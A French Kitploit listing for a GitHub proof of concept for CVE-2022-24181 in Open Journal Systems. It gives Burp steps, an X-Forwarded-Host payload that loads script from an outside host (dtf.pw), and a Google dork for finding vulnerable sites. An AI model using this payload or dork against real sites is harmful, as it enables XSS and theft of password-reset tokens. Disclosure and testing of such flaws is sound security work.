Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-24181 — XSS via injection d'en-tête Host et vol du jeton de réinitialisation de mot de passe d'un autre utilisateur | Kitploit
Outils/GitHubGitHub/cyberhawk000/cve-2022-24181
ReconnaissanceAnalyse des VulnérabilitésExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcyberhawk000/cve-2022-24181

CVE-2022-24181

XSS via injection d'en-tête Host et vol du jeton de réinitialisation de mot de passe d'un autre utilisateur

Voir le dépôt
112il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-24181 et CVE-2022-26616. Les deux sont probablement identiques.

Open-journal-system-Vulnerability

XSS via l'injection d'en-tête Host et vol du jeton de réinitialisation de mot de passe d'un autre utilisateur Étapes pour reproduire :

  1. Aller sur ce site : https://who's-using-ojs-software.com
  2. Capturez cette requête dans Burp , et envoyez-la dans Repeater.
  3. Ajoutez ceci après l'en-tête Host X-Forwarded-Host: foo"><script src=//dtf.pw/2.js><x=".com
  4. Et cliquez sur Send , puis faites un clic droit sur la requête et cliquez sur « Show response in browser » , puis copiez la requête.
  5. Collez cette requête dans le navigateur , et vous verrez une pop-up XSS. Atténuation : mettre à jour vers une version plus récente.

Google Dork pour trouver cette vulnérabilité intitle:ojs Cette vulnérabilité concerne le logiciel PKP Open-journal-system : les versions 2.4.8 à 3.3.8 sont toutes vulnérables aux XSS via l'injection d'en-tête Host et au vol du jeton de réinitialisation de mot de passe.

Télécharger l’outil